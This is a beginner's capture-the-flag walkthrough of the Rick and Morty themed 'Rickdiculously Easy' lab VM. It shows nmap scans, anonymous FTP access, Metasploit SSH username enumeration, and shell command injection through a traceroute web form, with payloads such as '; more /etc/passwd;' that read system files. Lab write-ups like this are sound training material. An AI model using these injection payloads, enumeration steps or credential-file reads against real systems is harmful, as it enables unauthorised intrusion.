_This is a fedora server vm, created with virtualbox.
It is a very simple Rick and Morty themed boot to root.
There are 130 points worth of flags available (each flag has its points recorded with it), you should also get root. It’s designed to be a beginner ctf, if you’re new to pen testing, check it out!


This is my first box I am attempting to hack into. I actually started out at BugCrowd since I figured I wanted to learn on a real system. So I started pooking away at an online retailer and I actually submitted my very first report. You probably could guess, that what I found was nothing at all. After a bunch of scans and still ending up nowhere, I realized I needed to study more. I just did not have the skills to hack into a real company (not yet). I actually downloaded a few pentesting books and realized these books actually don’t teach you to hack. They are useful but they just are not designed to prepare you for actual hacking. So the best resource I found was walkthoughs. Yes, they are on boxes meant to be for CFTs (Capture the Flag) and probably do not reflect real systems in the wild, but at least the writeups actually do show you how the author hacked the box. I figured if I could find enough writeups on a box and practice a lot, I should acquire the skills. I am writing these writeups mainly for practice, this is how I learn the best. These at some point might also be useful for future hackers that are at the learning stage of the journey. Note that I solved the box using and following other writeups and videos I found online.

  • Capture the Flag (CTF) - Flags are hidden in files, pictures, and other places. The goal is to find all of the hidden flags.
  • Fedora server vm - The type of linux virtual machine used to create the machine
  • Box/machine - This is the virtual machine. It’s like having a computer (tower/server/laptop) with its own OS (operating system) and memory but all virtualized. So hacking one of these vms is pretty close to reality (although these boxes are created with vulnerabilities on purpose)
  • Boot-to-root - Boxes designed to gain root/system privileges of the remote machine. Although for this box we also have CTF challenges.
  • BugCrowd - A company that lets you (legally) hack into real companies and if you are the first to find the issue/bug you may be given $$$.
  • Writeup/walkthrough - Author will write in detail how he/she was able to hack into the box. Some skip over steps and some do things differently so it is good to use many sources.

Set Up

I’m going to skip getting Kali linux set up as I will cover that somewhere else. I’m also not going to show you how to get VirtualBox installed. But below are the steps to download this box and fire it up.

  • Download the file from the url below

  • The file is ~780 mb and if you have a fast connection this should take you a few minutes

  • Unzip the file. Below are the contents of the unzipped folder

    • Make sure you also run a virus check (paranoid mode activated, lol)

  • Now open up VirtualBox (there are other tools out there, but this is the software I use to run virtual machines)

  • In the Oracle VM VirtualBox Manager, go to the Machine menu and select the Add option as shown below.

  • Now select the Ridiculously Easy file and click the Open button as shown below

  • You should now see the vm added to VirtualBox

  • Let’s change a few setting before we fire it up, click on settings

  • In the Rickdiculously Easy Settings dialog box, select System
    • Make sure the Boot Order only has Hard Disk selected
    • Make sure all the other setting match the picture below

  • In the Network tab
    • Change attached to from NAT to Bridged Adapter. I left everything else default.
    • I change this option so that the vm will have its own ip address

  • When you are done, click on the OK button to the lower right

  • Now click the Start button as shown below

  • In the VirtualBox - Information dialog box, select Cancel

  • If you see a screen similar to the one below, you are in business.

Find the IP address of the Rickdiculously Easy box

In order to attach the box, we need an IP address. Below are a few methods used on some of the writeups.

  • ipconfig
    • Since my laptop is running Windows, let’s see if I can find the IP this way. Open up the command prompt and type ipconfig.

What we are after are the numbers after IPv4 Address. Below are the entries I found that might be related to VirtualBox.

As you can see this one had the word VirtualBox so this is probably either my Kali box or the box we are trying to attack. There was another ip ending in 86.146 but it didn’t say it was related to VirtualBox.

  • arp (Windows) Another idea for Windows is to use the arp -a command.

We are looking for numbers under the Internet Address column. I find the same two IPs as before so at this point I think it is between one of these.

  • ifconfig/ip a In Kali, I can try similar commands to see what I get. The ip command replaced ifconfig but I still tried both to see what I get. For these commands you are looking for the number next to inet. Interesting enough, I get an IP that ends in 86.151 which is not maching the two we found above. Very odd.

  • arp (Linux) So now let’s see if we get different results running the arp command in Kali.

OK so it seems like the 86.146 is tied to my laptop and maybe some of the other ones are VirtualBox. Not sure?

  • netdiscover Looking at the writeups, it seems like netdiscover is a popular tool. I’m not sure how it works but it gave me the results below.

This seems like a winner! It doesn’t tell me which are VirtualBox IPs but it did retrieve the results much faster and in a clean format.

Using Nmap to determine the right IP

Nmap is a network mapper that we can use to find the OS (operating system) behind an IP address. Let’s run some of these IPs through nmap and see if we can find the VirtualBox ones.

(base) root@kali:~# nmap -O
MAC Address: 08:00:27:BF:52:95 (Oracle VirtualBox virtual NIC)
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
(base) root@kali:~# nmap -O
MAC Address: E4:F0:42:E8:12:FA (Google)
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9

As you can see from the results above, 86.154 look like a winner.

  • arp-scan -l

Gary Hoffman in his write up used this command and this was even faster than netdiscover (took just 2 seconds). Thanks!

Using all the methods above, you should now be able to quickly and easily find the attaking computer.

Scanning the Target

Now that we have an IP address, we can begin with nmap. This is the tool that will tell us what ports are open and what services are on those ports. From there we can continue to dig and see if we can find any vulnerabilities.

  • In Kali open the terminal
  • I like to start out by scanning all the ports.
    • -p is used to specify port numbers. If you type -p- these means scan all ports (0 to 65,535)
(base) root@kali:~# nmap -p-
Starting Nmap 7.80 ( [https://nmap.org](https://nmap.org) ) at 2020-04-02 16:06 EDT
Nmap scan report for
Host is up (0.000098s latency).
Not shown: 65528 closed ports
21/tcp    open  ftp
22/tcp    open  ssh
80/tcp    open  http
9090/tcp  open  zeus-admin
13337/tcp open  unknown
22222/tcp open  easyengine
60000/tcp open  unknown
MAC Address: 08:00:27:BF:52:95 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 2.68 seconds

I was able to find 7 open ports. Let’s take a look at each one.

These are common ports:

  • 22 - Secure Shell (SSH)
  • 21 - File Transfer Protocol (FTP)
  • 80 - Hypertext Transfer Protocol (HTTP)

These are the uncommon ports:

  • 9090 - Googling around it seems like its a webserver that is no longer maintained

  • 13337 - Didn’t find much on this port

  • 22222 - EasyEngine is a command line script that makes it easy to manage multiple WordPress sites powered by Nginx web server

  • 60000 - ephemeral port

  • The next step I do it run a more aggressive scan and attempt to find version/OS information on these open ports

    • The -A option will enable OS detection, version detection, script scanning, and traceroute
(base) root@kali:~# nmap -A -p22,21,80,9090,13337,22222,60000
Starting Nmap 7.80 ( [https://nmap.org](https://nmap.org) ) at 2020-04-03 15:44 EDT
Nmap scan report for
Host is up (0.00026s latency).
21/tcp    open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r--    1 0        0              42 Aug 22  2017 FLAG.txt
|_drwxr-xr-x    2 0        0               6 Feb 12  2017 pub
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 1
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp    open  ssh?
| fingerprint-strings: 
|   NULL: 
|_    Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 4.4.0-31-generic x86_64)
80/tcp    open  http    Apache httpd 2.4.27 ((Fedora))
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.27 (Fedora)
|_http-title: Mortys Website
9090/tcp  open  http    Cockpit web service
|_http-title: Did not follow redirect to [](
13337/tcp open  unknown
| fingerprint-strings: 
|   NULL: 
|_    FLAG:{TheyFoundMyBackDoorMorty}-10Points
22222/tcp open  ssh     OpenSSH 7.5 (protocol 2.0)
| ssh-hostkey: 
|   2048 b4:11:56:7f:c0:36:96:7c:d0:99:dd:53:95:22:97:4f (RSA)
|   256 20:67:ed:d9:39:88:f9:ed:0d:af:8c:8e:8a:45:6e:0e (ECDSA)
|_  256 a6:84:fa:0f:df:e0:dc:e2:9a:2d:e7:13:3c:e7:50:a9 (ED25519)
60000/tcp open  unknown
| fingerprint-strings: 
|   NULL, ibm-db2: 
|_    Welcome to Ricks half baked reverse shell...
3 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at [https://nmap.org/cgi-bin/submit.cgi?new-service](https://nmap.org/cgi-bin/submit.cgi?new-service:
MAC Address: 08:00:27:BF:52:95 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
1   0.26 ms
OS and Service detection performed. Please report any incorrect results at [https://nmap.org/submit/](https://nmap.org/submit/.
Nmap done: 1 IP address (1 host up) scanned in 44.40 seconds

As you can see we get a lot more information here. Let’s go through each port again and see what we find.

Port 21

  • We are running FTP version vsftpd 3.0.3
    • We might be able to google for an exploit for version 3.0.3
  • Anonymous FTP login allowed
    • I’m not sure what this means
  • A couple of files were found
    • FLAG.txt - This is obviously a hidden flag we found (now how to open it…)
    • pub - I have no idea what this could be
  • FTP server status
    • It seems like nmap was able to connect to this port via FTP and that is how it found those two files but not 100% sure

So let’s just stop here and see if we can login into FTP and get the FLAG nmap says it found. If you have no idea how to use FTP, then don’t worry, I also had no idea.

Here are a few ways you can log into FTP:

There is the FLAG.txt and I guess pub was a folder. Let’s open the txt file to see what is inside.

FLAG{Whoa this is unexpected} - 10 Points10/130

Boom! Our very first flag and all we did was run nmap. That was pretty easy but as you can see we didn’t really learn much on the hacking side. So let’s keep going. The pb folder ended up being empty so nothing else of interest for us.

  • Command line
    • ftp

But… as soon as I ran the command, I was asked for a user name. This is odd since I was not asked for this information using a web browser. Time to search the web for answers. After doing some Googling, it seems like Chrome always tries to use Anonymous to access FTP. After some more Googling it seems like the user name is anonymous and the password can be anything you want, even blank. Let’s try to log on via command line again using the anonymous user name.

(base) root@kali:~# ftp
Connected to
220 (vsFTPd 3.0.3)
Name ( anonymous
331 Please specify the password.
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.

That worked! Let’s navigate through the command line and see if we see anything different than what Chrome showed us.

FTP Cheat Sheet:

  • ls - List all files in current directory
  • get - Download a file into your root folder (I used this one to download the FLAG.txt file)
  • cd - Used to change directory (we used this below to get to the pub folder)
  • cd .. - Used to move up one directory (I was not able to find any other directories)

Note: I kept getting this message “Consider using PASV”. I’m guessing this is a tool for FTP, but for now Chrome and the terminal have been good enough for me.

ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 0        0              42 Aug 22  2017 FLAG.txt
drwxr-xr-x    2 0        0               6 Feb 12  2017 pub
226 Directory send OK.
ftp> get FLAG.txt
local: FLAG.txt remote: FLAG.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for FLAG.txt (42 bytes).
226 Transfer complete.
42 bytes received in 0.00 secs (455.7292 kB/s)
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 0        0              42 Aug 22  2017 FLAG.txt
drwxr-xr-x    2 0        0               6 Feb 12  2017 pub
226 Directory send OK.
ftp> cd pub
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
226 Directory send OK.
ftp> cd ..
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 0        0              42 Aug 22  2017 FLAG.txt
drwxr-xr-x    2 0        0               6 Feb 12  2017 pub
226 Directory send OK.
ftp> cd ..
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 0        0              42 Aug 22  2017 FLAG.txt
drwxr-xr-x    2 0        0               6 Feb 12  2017 pub
226 Directory send OK.
ftp> cd ..
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 0        0              42 Aug 22  2017 FLAG.txt
drwxr-xr-x    2 0        0               6 Feb 12  2017 pub
226 Directory send OK.
ftp> exit
221 Goodbye.
(base) root@kali:~#

I didn’t find anything new here, but I know know how to log into ftp, very nice. I looked through a bunch of write-ups and I did not see anything else we can do with this port. Everyone just grabbed the flag and moved on.

Port 22 It seems like we are running Ubuntu 14.04.5 LTS (GNU/Linux 4.4.0-31-generic x86_64)

OK, so nmap didn’t give us much more than this. Let’s try to connect to ssh. And yes, I don’t know how to do that. Google time!

Connect to ssh = ssh USER@IP -p PORT

Alright, so all we need is a user name, ip number and a port number. I have all those except a user name. As you can see below, I tried to login using several default usernames I found online, but none of them worked.

(base) root@kali:~# ssh ubuntu@ -p 22
kex_exchange_identification: Connection closed by remote host
(base) root@kali:~# ssh root@ -p 22
kex_exchange_identification: Connection closed by remote host
(base) root@kali:~# ssh admin@ -p 22
kex_exchange_identification: Connection closed by remote host
(base) root@kali:~# ssh Ubuntu@ -p 22
kex_exchange_identification: Connection closed by remote host
(base) root@kali:~# ssh superuser@ -p 22
kex_exchange_identification: Connection closed by remote host
(base) root@kali:~

Since I don’t have a username, I could not help myself and attempt to brute force my way in using metasploit. Below are the steps.

  • Open a new terminal window
  • Type msfconsole to open up metasploit
  • Type search ssh
    • This is to see what options we have available for ssh in general
    • I decided to attempt to enumerate the users or to find out if I can find a username
  • Type use auxiliary/scanner/ssh/ssh_enumusers
  • Type show options
    • We can see that we need to at least supply an ip number
  • Type set rhosts
  • Type exploit to actually perform the attack (I see ppl call this to run the payload)

Below is the command history for reference. Now if you look closely I could have chossen aother ssh attacks, but this is the one I decided to try mu luck with. The odd part was that after I ran the payload, the output from metasploit was inconclusive.

[] - SSH - Using malformed packet technique [-] Please populate USERNAME or USER_FILE [] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed

Really? It says it completed but it doesn’t tell me much more. Sigh… It does say to please populate a USERNAME or USER_FILE so let’s try that. Even though the options says this is not required.

(base) root@kali:~# msfconsole
[-] ***rting the Metasploit Framework console.../
[-] * WARNING: No database support: No database YAML file
[-] ***
[-] WARNING! The following modules could not be loaded!
[-]     /usr/share/metasploit-framework/modules/payloads/stages/windows/encrypted_shell.rb
[-] Please see /root/.msf4/logs/framework.log for details.
|                                                                              |
|                          3Kom SuperHack II Logon                             |
|                                                                              |
|                                                                              |
|                                                                              |
|                 User Name:          [   security    ]                        |
|                                                                              |
|                 Password:           [               ]                        |
|                                                                              |
|                                                                              |
|                                                                              |
|                                   [ OK ]                                     |
|                                                                              |
|                             [https://metasploit.com](https://metasploit.com|
       =[ metasploit v5.0.63-dev                          ]
+ -- --=[ 1951 exploits - 1091 auxiliary - 334 post       ]
+ -- --=[ 558 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]
msf5 > search ssh
Matching Modules
   #   Name   Disclosure Date  Rank       Check  Description
   -   ----   ---------------  ----       -----  -----------
   16  auxiliary/scanner/ssh/ssh_enumusers normal Yes SSH Username Enumeration
msf5 > use auxiliary/scanner/ssh/ssh_enumusers
msf5 auxiliary(scanner/ssh/ssh_enumusers> show options
Module options (auxiliary/scanner/ssh/ssh_enumusers):
   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   CHECK_FALSE  false            no        Check for false positives (random username)
   Proxies                       no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                        yes       The target host(s), range CIDR identifier, or hosts file with syntax '[file:<path>](file://%3cpath%3e)'
   RPORT        22               yes       The target port
   THREADS      1                yes       The number of concurrent threads (max one per host)
   THRESHOLD    10               yes       Amount of seconds needed before a user is considered found (timing attack only)
   USERNAME                      no        Single username to test (username spray)
   USER_FILE                     no        File containing usernames, one per line
Auxiliary action:
   Name              Description
   ----              -----------
   Malformed Packet  Use a malformed packet
msf5 auxiliary(scanner/ssh/ssh_enumusers> set rhosts
rhosts =>
msf5 auxiliary(scanner/ssh/ssh_enumusers> exploit
[*] - SSH - Using malformed packet technique
[-] Please populate USERNAME or USER_FILE
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Well you already guessed it, I have no idea where to find the username file. I know Kali already comes with word lists, but I don’t know where they live. Back to Google.

Below are the exact steps I took to navigate to /usr/share/wordlists/metasploit#

(base) root@kali:/# ls
bin  boot  dev  etc  home  initrd.img  initrd.img.old  lib  lib32  lib64  libx32  lost+found  media  mnt  opt  proc  root  run  sbin  srv  sys  tmp  usr  var  vmlinuz  vmlinuz.old
(base) root@kali:/# cd usr
(base) root@kali:/usr# ls
bin  games  include  lib  lib32  lib64  libexec  libx32  local  sbin  share  src
(base) root@kali:/usr# cd share/
(base) root@kali:/usr/share# cd wordlists/                                              (base) root@kali:/usr/share/wordlists# ls                                               
dirb  dirbuster  fasttrack.txt  fern-wifi  metasploit  nmap.lst  rockyou.txt.gz  wfuzz                                       (base) root@kali:/usr/share/wordlists# cd metasploit
(base) root@kali:/usr/share/wordlists/metasploit# ls

Now that we found the word lists, which to use? Again, I am not sure, let’s just try unix_users.txt. Below are the steps to add the word list into the metasploit payload.

msf5 auxiliary(scanner/ssh/ssh_enumusers> set user_file /usr/share/wordlists/metasploit/unix_users.txt
user_file => /usr/share/wordlists/metasploit/unix_users.txt
msf5 auxiliary(scanner/ssh/ssh_enumusers> exploit
[*] - SSH - Using malformed packet technique
[*] - SSH - Starting scan
[-] - SSH - User '4Dgifts' not found
[-] - SSH - User 'EZsetup' on could not connect
[-] - SSH - User 'OutOfBox' on could not connect
[-] - SSH - User 'ROOT' on could not connect
[-] - SSH - User 'adm' on could not connect
[-] - SSH - User 'admin' on could not connect
[-] - SSH - User 'administrator' on could not connect
[-] - SSH - User 'anon' on could not connect
[-] - SSH - User 'auditor' on could not connect

So for every username, we will see a new line in the terminal. This is very slow, so I just leave it running in the background. By typing “wc -l unix_users.txt”, we can see that we have 113 usernames to go through, so hopefully this won’t take a very long time.

  • wc - word count
  • -l - is used to only return the number of lines found

After the payload completed, I ended up empty. It did not find a valid username, bummer. I googled around for this error “kex_exchange_identification: Connection closed by remote host”, but I could not find a reason why this port is giving me this error. I looked a several other write-ups and I did not find anyone that was able to connect or do anything with this port.

Port 80

  • It seems to be running Apache httpd 2.4.27 ((Fedora))
    • not sure if we can exploit http
  • Potentially risky methods: TRACE
    • When doing some bughunting (bugcrowd), I came across this often, and this just seems like a false positive

How do we check if TRACE is enabled?

  • Use nmap
    • nmap -p80 —script http-methods,http-trace —script-args http-methods.retest
(base) root@kali:~# nmap -p80 --script http-methods,http-trace --script-args http-methods.retest
Starting Nmap 7.80 ( [https://nmap.org](https://nmap.org) ) at 2020-04-08 16:03 EDT
Nmap scan report for
Host is up (0.00060s latency).
80/tcp open  http
| http-methods: 
|   Supported Methods: HEAD GET POST OPTIONS TRACE
|   Potentially risky methods: TRACE
|   Status Lines: 
|     POST: HTTP/1.1 200 OK
|     TRACE: HTTP/1.1 200 OK
|     GET: HTTP/1.1 200 OK
|     OPTIONS: HTTP/1.1 200 OK
|_    HEAD: HTTP/1.1 200 OK
|_http-trace: TRACE is enabled
MAC Address: 08:00:27:BF:52:95 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 0.56 seconds

TRACE is enabled? Wow, I never got this while bughunting. Let’s see if we can do anything with this. On to Google. Well, after going through 3 or 4 websites, it seems like there really isn’t anything interesting with TRACE. First, it seems like the real exploits were available a long time ago and all we can do know if maybe get some server information. Nothing too exciting to be honest. Below are the methods to try if you even come across this.

  • Try to pull out information using telnet
    • type the following after you connect
Host: foo.bar
X-Header: test

See the code in action below:

(base) root@kali:~# telnet 80
Connected to
Escape character is '^]'.
Host: foo.bar
X-Header: test

Using the code above I did get “Server: Apache/2.4.27 (Fedora)” but we already knew that.

  • Try to pull out info using nc
    • curl -X TRACE
    • curl -X TRACE -H “X-Header: test”

Using the commands above resulted in nothing, absolutely nothing. Now that we are done with that, let’s see what Chrome can provide us. As you can see below it seems we just get a website that has a picture.

Let’s take a look at the page source code. To do this, just right click on the page and click the View page source option as shown below.

So as you can see, there isn’t much here.

My next step is to look at the robots.txt file. I’m sure there are lots of references to this cartoon, but I am not getting them at all. OK so we find some more urls to poke around with.

Seems like there is nothing here to see…

This looks promising! Let’s put an ip address here. I got results back.

If I run traceroute in the terminal, I get the same results.

(base) root@kali:~# traceroute
traceroute to (, 30 hops max, 60 byte packets
1 ( 0.262 ms 0.228 ms 0.209 ms

I have no idea how to attack this, but looking at the write-ups this tool was vulnerable to command execution. All we have to do is add a semi-colon after the ip number and we can run commands like if we were in a terminal. Below are examples pulled from the write-ups.

  •; id;

traceroute to (, 30 hops max, 60 byte packets

 1  localhost (  0.009 ms  0.003 ms  0.003 ms

uid=48(apache) gid=48(apache) groups=48(apache) context=system_u:system_r:httpd_sys_script_t:s0

This returned some information, but nothing useful for me.

  •; ls;

traceroute to (, 30 hops max, 60 byte packets

 1  localhost (  0.010 ms  0.005 ms  0.003 ms



This shows me there are two cgi files in this directory. We already knew this from the robotx.txt file.

  •; cd ..; ls;

traceroute to (, 30 hops max, 60 byte packets

 1  localhost (  0.010 ms  0.003 ms  0.003 ms



We can actually move up a folder and list the files. So as you can expect, I just kept navigating through the files and actually found a flag! The flag was in a passwords folder and the cgi tools where in the cgi-bin folder. This is probably not the intended method to get this flag, but it got us there.

Notice I used more instead of cat to read the file. This box returns a picture of a cat whe you use the cat command, so we needed to use an alternative command.

Below are some of the commands you can use instead of cat:

  • more
  • less
  • grep ‘[a-zA-Z0-9]’

command =; cd ..; cd html; ls; cd passwords; ls; more FLAG.txt;

traceroute to (, 30 hops max, 60 byte packets
 1  localhost (  0.020 ms  0.014 ms  0.007 ms
FLAG{Yeah d- just don't do it.} - 10 Points

Now we have 2 flags and 20 points.

FLAG{Whoa this is unexpected} - 10 Points10/130
FLAG{Yeah d- just don’t do it.} - 10 Points20/130
  • ;more /etc/passwd;

We can acutally not even provide an ip address as shown above. The /etc/passwd contains user accounts. Below is the format of each line.

  • Username: It is used when user logs in. It should be between 1 and 32 characters in length.
  • Password: An x character indicates that encrypted password is stored in /etc/shadow file. Please note that you need to use the passwd command to computes the hash of a password typed at the CLI or to store/update the hash of the password in /etc/shadow file.
  • User ID (UID): Each user must be assigned a user ID (UID). UID 0 (zero) is reserved for root and UIDs 1-99 are reserved for other predefined accounts. Further UID 100-999 are reserved by system for administrative and system accounts/groups.
  • Group ID (GID): The primary group ID (stored in /etc/group file)
  • User ID Info: The comment field. It allow you to add extra information about the users such as user’s full name, phone number etc. This field use by finger command.
  • Home directory: The absolute path to the directory the user will be in when they log in. If this directory does not exists then users directory becomes /
  • Command/shell: The absolute path of a command or shell (/bin/bash). Typically, this is a shell. Please note that it does not have to be a shell.
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
systemd-coredump:x:999:998:systemd Core Dumper:/:/sbin/nologin
systemd-timesync:x:998:997:systemd Time Synchronization:/:/sbin/nologin
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
systemd-resolve:x:193:193:systemd Resolver:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
polkitd:x:997:996:User for polkitd:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin
cockpit-ws:x:996:994:User for cockpit-ws:/:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin

Out of all these accounts, the three below stand out to me.

  • RickSanchez:x:1000:1000::/home/RickSanchez:/bin/bash
  • Morty:x:1001:1001::/home/Morty:/bin/bash
  • Summer:x:1002:1002::/home/Summer:/bin/bash

I did try to read the /etc/shadow file but this did not work. It is nmasuppose to have the account passwords, but no luck getting access to this file.